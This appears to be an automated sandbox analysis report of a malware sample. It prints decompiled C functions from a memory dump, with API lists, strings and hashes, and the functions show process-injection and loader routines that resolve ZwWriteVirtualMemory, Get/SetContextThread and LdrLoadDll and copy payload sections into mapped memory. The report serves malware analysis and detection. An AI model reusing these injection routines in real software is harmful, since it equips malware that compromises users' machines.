0x00ab2d00
0x00ab2d05
0x00ab2d08
0x00ab2d0d
0x00ab2d12
0x00ab2d12
0x00000000
0x00ab2d0d

APIs

Part of subcall function 00AB3509: GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000002,00000000,NTDLL.DLL,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB351D
Part of subcall function 00AB3509: GetProcAddress.KERNEL32(00000000,ZwWow64QueryInformationProcess64), ref: 00AB3529
Part of subcall function 00AB3509: NtWow64QueryInformationProcess64.NTDLL(00000008,00000000,00000030,00000030,00000008,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3545

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2C30
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AB2D25

Part of subcall function 00AB3509: StrRChrA.KERNELBASE(00000020,00000000,0000005C), ref: 00AB36D7
Part of subcall function 00AB3509: LocalFree.KERNEL32(?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D,00000000), ref: 00AB3728
Part of subcall function 00AB3509: LocalFree.KERNEL32(00000000,?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3732

VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00AB2C6B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AB2C7B
lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CB9
StrChrA.SHLWAPI(?,0000002E), ref: 00AB2CC8
lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CDB

Strings

NTDLL.DLL, xrefs: 00AB2C07

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeVirtual$AllocLocallstrcmpi$AddressHandleInformationModuleProcProcess64QueryWow64
String ID: NTDLL.DLL
API String ID: 2432548908-1613819793
Opcode ID: ec4e04f22a1356b29fd7da86dfeeed9d7195bb5ea3fbb5e8b171d9d02badf796
Instruction ID: a21fbd31fa73cd96ce7f0f9ad86b1fc9e1bbb749f081066c1b015170e11c4036
Opcode Fuzzy Hash: ec4e04f22a1356b29fd7da86dfeeed9d7195bb5ea3fbb5e8b171d9d02badf796
Instruction Fuzzy Hash: 9041DD31A01605FFEB219FA5DC45BAE7FB8FF45701F20412AF904AA292D7719E00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB20D2, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?), ref: 00AB20F2
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AB20FF

Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27

FindCloseChangeNotification.KERNELBASE(00000000), ref: 00AB21FE

Strings

ZwProtectVirtualMemory, xrefs: 00AB2105
NTDLL.DLL, xrefs: 00AB210A, 00AB2111, 00AB211D
ZwWriteVirtualMemory, xrefs: 00AB2118

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProcessVirtual$AllocChangeCloseCurrentFindFreeNotificationOpen
String ID: NTDLL.DLL$ZwProtectVirtualMemory$ZwWriteVirtualMemory
API String ID: 1388074787-2238432915
Opcode ID: f355facfac8a20c10e48d15d421cbf627da715d51de8770d358a2dea80a0466a
Instruction ID: 0ea1abe7812574b4b94387aa2fc9fe26fa9d73f041ef1151f632d1b175ec9ba4
Opcode Fuzzy Hash: f355facfac8a20c10e48d15d421cbf627da715d51de8770d358a2dea80a0466a
Instruction Fuzzy Hash: 6F41A1B2D0020DBFDF019FD9DD41AEEBBBAFB48314F144129F610A2261D7319A619B60

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3003, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00AB3003(void* __ecx, long _a4, void* _a8) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				long _t19;
				void* _t22;

				_v8 = _v8 & 0x00000000;
				_t9 =  *0xb16d88;
				if(_t9 != 0) {
					L2:
					_t19 = _a4;
					if(_t19 == 0) {
						_t22 = _a8;
					} else {
						_t22 = OpenProcess(0x400, 0, _t19);
						_t9 =  *0xb16d88;
					}
					if(_t22 != 0) {
						_t11 =  *_t9(_t22,  &_v8);
						asm("sbb eax, eax");
						_v8 = _v8 &  ~_t11;
						if(_t19 != 0) {
							FindCloseChangeNotification(_t22); // executed
						}
					}
					L9:
					return _v8;
				}
				_t9 = GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "IsWow64Process");
				 *0xb16d88 = _t9;
				if(_t9 == 0) {
					goto L9;
				}
				goto L2;
			}

0x00ab3007
0x00ab300b
0x00ab3012
0x00ab3034
0x00ab3036
0x00ab303b
0x00ab3054
0x00ab303d
0x00ab304b
0x00ab304d
0x00ab304d
0x00ab3059
0x00ab3060
0x00ab3064
0x00ab3066
0x00ab306b
0x00ab306e
0x00ab306e
0x00ab306b
0x00ab3076
0x00ab307c
0x00ab307c
0x00ab3025
0x00ab302b
0x00ab3032
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB301E
GetProcAddress.KERNEL32(00000000), ref: 00AB3025
OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB3045
FindCloseChangeNotification.KERNELBASE(00AB14C8,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB306E

Strings

IsWow64Process, xrefs: 00AB3014
KERNEL32.DLL, xrefs: 00AB3019

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressChangeCloseFindHandleModuleNotificationOpenProcProcess
String ID: IsWow64Process$KERNEL32.DLL
API String ID: 869619728-1193389583
Opcode ID: a8a629ba45bfdebf6d417575aea8ea21ea238532d8a78cd639851fea4d5229fd
Instruction ID: 819ec6078c268ac5cc9a7f60b68ddea59fb817b3fda966af75e8b3afa318736c
Opcode Fuzzy Hash: a8a629ba45bfdebf6d417575aea8ea21ea238532d8a78cd639851fea4d5229fd
Instruction Fuzzy Hash: C7018432A41604EBCB20EFB9EC49FEEB7BCAF40B15F154254F904E7252DB309E019690

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3255, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00AB3255(signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t1;
				void* _t5;
				signed int _t6;
				signed int _t9;
				char* _t12;
				void* _t14;
				signed int _t15;
				void* _t17;
				signed int* _t19;

				_t15 = __edx;
				_t1 =  *0xb16d68; // 0xbd51bcd0
				_t19 = 0;
				_t23 = _t1 |  *0xb16d6c;
				if((_t1 |  *0xb16d6c) != 0) {
					_t19 = 0xb16d68;
				} else {
					_t5 = OpenProcess(0x410, 0, GetCurrentProcessId());
					_push("ZwGetContextThread");
					_t12 = "NTDLL.DLL";
					_t17 = _t5;
					_push(_t12);
					_push(_t17); // executed
					_t6 = E00AB2A4E(_t12, _t14, _t17, 0, _t23); // executed
					 *0xb16d68 = _t6;
					_t24 = _t6 | _t15;
					 *0xb16d6c = _t15;
					if((_t6 | _t15) != 0) {
						_push("ZwSetContextThread");
						_push(_t12);
						_push(_t17); // executed
						_t9 = E00AB2A4E(_t12, _t14, _t17, 0, _t24); // executed
						 *0xb16d70 = _t9;
						 *0xb16d74 = _t15;
						if((_t9 | _t15) != 0) {
							_t19 = 0xb16d68;
						}
					}
					FindCloseChangeNotification(_t17); // executed
				}
				return _t19;
			}

0x00ab3255
0x00ab3255
0x00ab325b
0x00ab325d
0x00ab3263
0x00ab32cd
0x00ab3265
0x00ab3274
0x00ab327a
0x00ab327f
0x00ab3284
0x00ab3286
0x00ab3287
0x00ab3288
0x00ab3290
0x00ab3295
0x00ab3297
0x00ab329d
0x00ab329f
0x00ab32a4
0x00ab32a5
0x00ab32a6
0x00ab32ae
0x00ab32b5
0x00ab32bb
0x00ab32bd
0x00ab32bd
0x00ab32bb
0x00ab32c3
0x00ab32ca
0x00ab32d5

APIs

GetCurrentProcessId.KERNEL32(00000008,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3267
OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274

Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27

FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3

Strings

ZwSetContextThread, xrefs: 00AB329F
NTDLL.DLL, xrefs: 00AB327F, 00AB3286, 00AB32A4
ZwGetContextThread, xrefs: 00AB327A

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProcessVirtual$AllocChangeCloseCurrentFindFreeNotificationOpen
String ID: NTDLL.DLL$ZwGetContextThread$ZwSetContextThread
API String ID: 1388074787-3220980157
Opcode ID: d5100de36b3b92892806486825ca2e0114afb8a46c68e07a46ec00c14c43ba2d
Instruction ID: fd947956a64045e12a5dfb9fbf2bf1747a5e3e4104e497d1b678f5113e63596a
Opcode Fuzzy Hash: d5100de36b3b92892806486825ca2e0114afb8a46c68e07a46ec00c14c43ba2d
Instruction Fuzzy Hash: 8BF062B2F01610AB8721ABB4BC819FA377CFBA17543958436F50497122DA204D02CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2813, Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00AB2813(void* __ecx, intOrPtr _a4, signed char _a8) {
				struct HINSTANCE__* _t13;
				void* _t15;
				void* _t18;
				signed int _t20;
				signed int _t23;
				signed char _t25;
				void* _t26;
				void* _t28;
				signed int _t33;
				signed int _t42;
				signed int _t43;

				_t26 = __ecx;
				 *0xb16d4c = _a4;
				_t33 = 0;
				_t13 = GetModuleHandleA(0);
				_t25 = _a8;
				 *0xb16d48 = _t13;
				if((_t25 & 0x00000001) != 0) {
					 *0xb16d40 = GetVersion();
				}
				if((_t25 & 0x00000002) == 0) {
					_t14 =  *0xb16d3c; // 0x1898
				} else {
					 *0xb16d3c = GetCurrentProcessId();
				}
				_t15 = E00AB3003(_t26, _t14, 0); // executed
				_pop(_t28);
				if(_t15 != 0) {
					 *0xb16d44 =  *0xb16d44 | 0x00000001;
				}
				_t42 = _t25 & 0x00000004;
				if(_t42 == 0) {
					L9:
					_t43 = _t25 & 0x00000008;
					if(_t43 == 0) {
						L12:
						if((_t25 & 0x00000010) != 0) {
							_t18 = CreateEventA(0, 1, 0, 0);
							 *0xb16d58 = _t18;
							if(_t18 == 0) {
								_t33 = GetLastError();
							}
						}
						goto L15;
					}
					_t20 = E00AB29D6(_t28, 0, 0xb16d50);
					asm("sbb esi, esi");
					_t33 =  ~( ~_t20);
					if(_t43 != 0) {
						goto L15;
					}
					 *0xb16d5c =  &((StrRChrA( *0xb16d50, 0, 0x5c))[1]);
					goto L12;
				} else {
					_t23 = E00AB29D6(_t28,  *0xb16d4c, 0xb16d54);
					asm("sbb esi, esi");
					_t33 =  ~( ~_t23);
					_pop(_t28);
					if(_t42 != 0) {
						L15:
						if(_t33 != 0) {
							E00AB28F2();
						}
						return _t33;
					}
					goto L9;
				}
			}

0x00ab2813
0x00ab281e
0x00ab2824
0x00ab2826
0x00ab282c
0x00ab282f
0x00ab2837
0x00ab283f
0x00ab283f
0x00ab2847
0x00ab2856
0x00ab2849
0x00ab284f
0x00ab284f
0x00ab285d
0x00ab2863
0x00ab2866
0x00ab2868
0x00ab2868
0x00ab286f
0x00ab2872
0x00ab2890
0x00ab2890
0x00ab2893
0x00ab28c1
0x00ab28c4
0x00ab28cb
0x00ab28d1
0x00ab28d8
0x00ab28e0
0x00ab28e0
0x00ab28d8
0x00000000
0x00ab28c4
0x00ab289b
0x00ab28a5
0x00ab28a7
0x00ab28aa
0x00000000
0x00000000
0x00ab28bc
0x00000000
0x00ab2874
0x00ab287f
0x00ab2889
0x00ab288b
0x00ab288d
0x00ab288e
0x00ab28e2
0x00ab28e4
0x00ab28e6
0x00ab28e6
0x00ab28f1
0x00ab28f1
0x00000000
0x00ab288e

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB2826
GetVersion.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2839
GetCurrentProcessId.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2849
StrRChrA.SHLWAPI(00000000,0000005C,?,?,?,00AB14C8,00000000), ref: 00AB28B5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB28CB
GetLastError.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB28DA

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateCurrentErrorEventHandleLastModuleProcessVersion
String ID:
API String ID: 3503360540-0
Opcode ID: 1fb4248619b017bc5033b70d20e3002ce37646ba542872d2502539bcf50fa82b
Instruction ID: ee336ac0408b7da41b1992ee47b4b5898ae121f1eba99251c43f6e7619b02167
Opcode Fuzzy Hash: 1fb4248619b017bc5033b70d20e3002ce37646ba542872d2502539bcf50fa82b
Instruction Fuzzy Hash: 3D21CF31A402219FD7256BB9FC49BD57BBCAB45790F44823BE905DB6B2DF208C408B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1E83, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00AB1E83(signed int __edx, void* _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t5;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				signed int _t15;
				signed int _t17;
				void* _t19;
				void* _t20;
				signed int _t21;
				char* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;

				_t21 = __edx;
				_t5 =  *0xb16d24; // 0xbd4ba770
				_t23 = 0;
				if((_t5 |  *0xb16d28) == 0) {
					L3:
					_t23 = 0x7f;
					_push("LdrLoadDll");
					_t22 = "NTDLL.DLL";
					_push(_t22);
					_push(_a8);
					_t7 = E00AB2A4E(_t19, _t20, _t22, _t23, _t30); // executed
					_t25 = _t24 + 0xc;
					 *0xb16d24 = _t7;
					_t31 = _t7 | _t21;
					 *0xb16d28 = _t21;
					if((_t7 | _t21) != 0) {
						_push("LdrGetProcedureAddress");
						_push(_t22);
						_push(_a8);
						_t10 = E00AB2A4E(_t19, _t20, _t22, _t23, _t31); // executed
						_t26 = _t25 + 0xc;
						 *0xb16d2c = _t10;
						_t32 = _t10 | _t21;
						 *0xb16d30 = _t21;
						if((_t10 | _t21) != 0) {
							_push("NtProtectVirtualMemory");
							_push(_t22);
							_push(_a8);
							_t12 = E00AB2A4E(_t19, _t20, _t22, _t23, _t32); // executed
							_t24 = _t26 + 0xc;
							 *0xb16d34 = _t12;
							 *0xb16d38 = _t21;
							if((_t12 | _t21) != 0) {
								_t23 = 0;
								goto L7;
							}
						}
					}
				} else {
					_t15 =  *0xb16d2c; // 0xbd4fff60
					if((_t15 |  *0xb16d30) == 0) {
						goto L3;
					} else {
						_t17 =  *0xb16d34; // 0xbd51a980
						_t30 = _t17 |  *0xb16d38;
						if((_t17 |  *0xb16d38) != 0) {
							L7:
							memcpy(_a4, 0xb16d24, 0x18);
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}

0x00ab1e83
0x00ab1e86
0x00ab1e8c
0x00ab1e95
0x00ab1eb1
0x00ab1eb3
0x00ab1eb4
0x00ab1eb9
0x00ab1ebe
0x00ab1ebf
0x00ab1ec2
0x00ab1ec7
0x00ab1eca
0x00ab1ecf
0x00ab1ed1
0x00ab1ed7
0x00ab1ed9
0x00ab1ede
0x00ab1edf
0x00ab1ee2
0x00ab1ee7
0x00ab1eea
0x00ab1eef
0x00ab1ef1
0x00ab1ef7
0x00ab1ef9
0x00ab1efe
0x00ab1eff
0x00ab1f02
0x00ab1f07
0x00ab1f0a
0x00ab1f11
0x00ab1f17
0x00ab1f19
0x00000000
0x00ab1f19
0x00ab1f17
0x00ab1ef7
0x00ab1e97
0x00ab1e97
0x00ab1ea2
0x00000000
0x00ab1ea4
0x00ab1ea4
0x00ab1ea9
0x00ab1eaf
0x00ab1f1b
0x00ab1f25
0x00000000
0x00000000
0x00000000
0x00ab1eaf
0x00ab1ea2
0x00ab1f32

APIs

memcpy.NTDLL(00000000,00B16D24,00000018,?,?,?,?,?,?,00AB1C81,00000000,?), ref: 00AB1F25

Strings

NtProtectVirtualMemory, xrefs: 00AB1EF9
LdrGetProcedureAddress, xrefs: 00AB1ED9
LdrLoadDll, xrefs: 00AB1EB4
NTDLL.DLL, xrefs: 00AB1EB9, 00AB1EBE, 00AB1EDE, 00AB1EFE

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$NtProtectVirtualMemory
API String ID: 3510742995-862099514
Opcode ID: 946d01cc20d9ee634e81d7544513cd1c8f17ea29ac13f3dd05b2777351a7c32b
Instruction ID: 1c0de0440e317bbd465dc57229efc712dba51330fd9a60417cac153562080b10
Opcode Fuzzy Hash: 946d01cc20d9ee634e81d7544513cd1c8f17ea29ac13f3dd05b2777351a7c32b
Instruction Fuzzy Hash: ED1112B1B11504B7C761AF69FD42AD27BA8EB94750794C53AF80897132E7329A14C790

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1B12, Relevance: 6.2, APIs: 4, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00AB1B12(void* __ebx, signed int __edx, intOrPtr* _a4, signed int _a8) {
				char _v8;
				char _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				signed int _t49;
				int _t51;
				void* _t54;
				void* _t60;
				int _t77;
				int _t78;
				void* _t79;
				void* _t85;
				void* _t87;
				signed int _t90;
				int _t92;
				int _t98;
				int _t100;
				void* _t102;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;

				_t104 = __edx;
				_t87 = __ebx;
				_v20 = E00AB2369;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t49 = _a8 & 0x00000010;
				_v24 = _t49;
				if(_t49 != 0 || ( *0xb16d44 & 0x00000001) == 0) {
					_t105 =  *0xb16cf4; // 0xab6000
				} else {
					_t105 =  *0xb16cfc; // 0xae1000
					_v20 = 0xb169d8;
				}
				if(_t105 != 0) {
					_t10 = _t105 + 0x3c; // 0x100
					_t92 =  *0xb16d04; // 0x2b000
					_push(_t87);
					_t51 =  *0xb16d08; // 0x35800
					_t90 =  *((intOrPtr*)( *_t10 + _t105 + 0x50)) + 0x00000fff & 0xfffff000;
					_t54 = E00AB2591(_t51 + _t92 + 0xc50 + _t90,  &_v8,  &_v16); // executed
					_t108 = _t54;
					if(_t108 == 0) {
						_t60 = E00AB27C1(_v16,  *_a4,  &_v12); // executed
						_t108 = _t60;
						if(_t108 == 0) {
							_t108 = E00AB2650(_v8, _t105, _v12);
							if(_t108 == 0) {
								memcpy(_v8 + 0xc50 + _t90,  *0xb16cf4,  *0xb16d04);
								_t98 =  *0xb16d04; // 0x2b000
								memcpy(_v8 + 0xc50 + _t98 + _t90,  *0xb16cfc,  *0xb16d08);
								_t107 = _v8 + _t90;
								asm("cdq");
								 *((intOrPtr*)(_t107 + 0x30)) = _v12;
								 *((intOrPtr*)(_t107 + 0x34)) = _t104;
								asm("cdq");
								 *((intOrPtr*)(_t107 + 0x18)) = _v12 + 0xc50 + _t90;
								 *((intOrPtr*)(_t107 + 0x1c)) = _t104;
								_t100 =  *0xb16d04; // 0x2b000
								_t101 = _t100 + _t90;
								asm("cdq");
								 *((intOrPtr*)(_t107 + 0x20)) = _v12 + 0xc50 + _t100 + _t90;
								 *((intOrPtr*)(_t107 + 0x24)) = _t104;
								_t77 =  *0xb16d04; // 0x2b000
								 *(_t107 + 0x28) = _t77;
								_t78 =  *0xb16d08; // 0x35800
								 *(_t107 + 0x2c) = _t78;
								if(_v24 != _t108 || ( *0xb16d44 & 0x00000001) == 0) {
									_t79 = E00AB1DD0(_t101, _t104, _t107);
								} else {
									_t79 = E00AB1E83(_t104, _t107,  *_a4); // executed
								}
								_t108 = _t79;
								_pop(_t102);
								if(_t108 == 0) {
									_t39 = _t107 + 0x40; // 0x40
									memcpy(_t39, _v20, 0x800);
									_t85 = E00AB2961(_t102, _t104, _a4, _v12 + _t90 + 0x40, _v12 + _t90, _a8); // executed
									_t108 = _t85;
								}
							}
						}
					}
					if(_v8 != 0) {
						E00AB27FB(0xffffffff, _v8); // executed
					}
					if(_v16 != 0) {
						FindCloseChangeNotification(_v16); // executed
					}
					goto L19;
				} else {
					_t108 = 2;
					L19:
					return _t108;
				}
			}

0x00ab1b12
0x00ab1b12
0x00ab1b1a
0x00ab1b21
0x00ab1b24
0x00ab1b27
0x00ab1b2e
0x00ab1b32
0x00ab1b35
0x00ab1b4f
0x00ab1b40
0x00ab1b40
0x00ab1b46
0x00ab1b46
0x00ab1b57
0x00ab1b61
0x00ab1b64
0x00ab1b6a
0x00ab1b75
0x00ab1b82
0x00ab1b93
0x00ab1b98
0x00ab1b9f
0x00ab1bb1
0x00ab1bb6
0x00ab1bbd
0x00ab1bcf
0x00ab1bd6
0x00ab1bf3
0x00ab1bfe
0x00ab1c17
0x00ab1c25
0x00ab1c27
0x00ab1c28
0x00ab1c2b
0x00ab1c38
0x00ab1c39
0x00ab1c3c
0x00ab1c3f
0x00ab1c48
0x00ab1c51
0x00ab1c52
0x00ab1c55
0x00ab1c58
0x00ab1c5d
0x00ab1c60
0x00ab1c65
0x00ab1c6b
0x00ab1c85
0x00ab1c76
0x00ab1c7c
0x00ab1c81
0x00ab1c8a
0x00ab1c8c
0x00ab1c8f
0x00ab1c99
0x00ab1c9d
0x00ab1cb2
0x00ab1cba
0x00ab1cba
0x00ab1c8f
0x00ab1bd6
0x00ab1bbd
0x00ab1cc1
0x00ab1cc8
0x00ab1cce
0x00ab1cd3
0x00ab1cd8
0x00ab1cd8
0x00000000
0x00ab1b59
0x00ab1b5b
0x00ab1cdf
0x00ab1ce5
0x00ab1ce5

APIs

memcpy.NTDLL(-00000C50,?,?,?,?,?,?,00000000,00000000,?), ref: 00AB1BF3
memcpy.NTDLL(-00000C50,-00000C50,?,?,?,?,?,?,00000000,00000000,?), ref: 00AB1C17
memcpy.NTDLL(00000040,00AB2369,00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB1C9D

Part of subcall function 00AB1DD0: GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000000,?,00AB1C8A,00000000), ref: 00AB1E06
Part of subcall function 00AB1DD0: memcpy.NTDLL(00AB1C8A,00B16D0C,00000018,?,00AB1C8A,00000000), ref: 00AB1E75

Part of subcall function 00AB2961: memset.NTDLL ref: 00AB297F
Part of subcall function 00AB2961: LocalFree.KERNEL32(00000000), ref: 00AB29CA

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?), ref: 00AB1CD8

Part of subcall function 00AB27FB: NtUnmapViewOfSection.NTDLL(00AB1CCD,?), ref: 00AB2804
Part of subcall function 00AB27FB: RtlNtStatusToDosError.NTDLL ref: 00AB280B

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy$ChangeCloseErrorFindFreeHandleLocalModuleNotificationSectionStatusUnmapViewmemset
String ID:
API String ID: 3425476150-0
Opcode ID: 4c18b4b0cdad86f946ba8aec6a68f853220071252a973cf76b106142afdff7de
Instruction ID: 6842ab8ccdcce3345ebbb4feed9dc32ddc918829788c5eaef5d09fab785f55fb
Opcode Fuzzy Hash: 4c18b4b0cdad86f946ba8aec6a68f853220071252a973cf76b106142afdff7de
Instruction Fuzzy Hash: CC515D76E41509AFCB11DFA8DD51BDDBBB8EF08314F544169E804E7352E735AE608B80

Uniqueness

Uniqueness Score: -1.00%

Function 00AB220D, Relevance: 6.1, APIs: 4, Instructions: 116
threadsleepinjectionCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00AB220D(signed int __edx) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr* _v40;
				char _v44;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1228;
				void _v1276;
				void* __ebx;
				void* __ecx;
				intOrPtr* _t38;
				void* _t40;
				void* _t44;
				void* _t46;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t58;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t66;
				intOrPtr* _t68;
				signed int _t74;
				void* _t78;
				void* _t81;
				void* _t82;

				_t62 = __edx;
				_t58 = _t74;
				_push(_t59);
				_push(_t59);
				_v8 =  *((intOrPtr*)(_t58 + 4));
				_push(_t63);
				_v28 = 0xccccfeeb;
				_t64 = _t63 | 0xffffffff;
				memset( &_v1276, 0, 0x4d0);
				_t38 = E00AB3255(_t62);
				_t68 =  *((intOrPtr*)(_t58 + 8));
				_v40 = _t38;
				_v1228 = 0x100003;
				_t40 = E00AB1F93(_t62,  *_t68,  &_v20); // executed
				_t78 = (_t74 & 0xfffffff0) + 4 - 0x4f8 + 0x14;
				if(_t40 >= 0) {
					_t44 = E00AB3236(_t59,  *_t68, _v20, _v16,  &_v44, 4,  &_v24); // executed
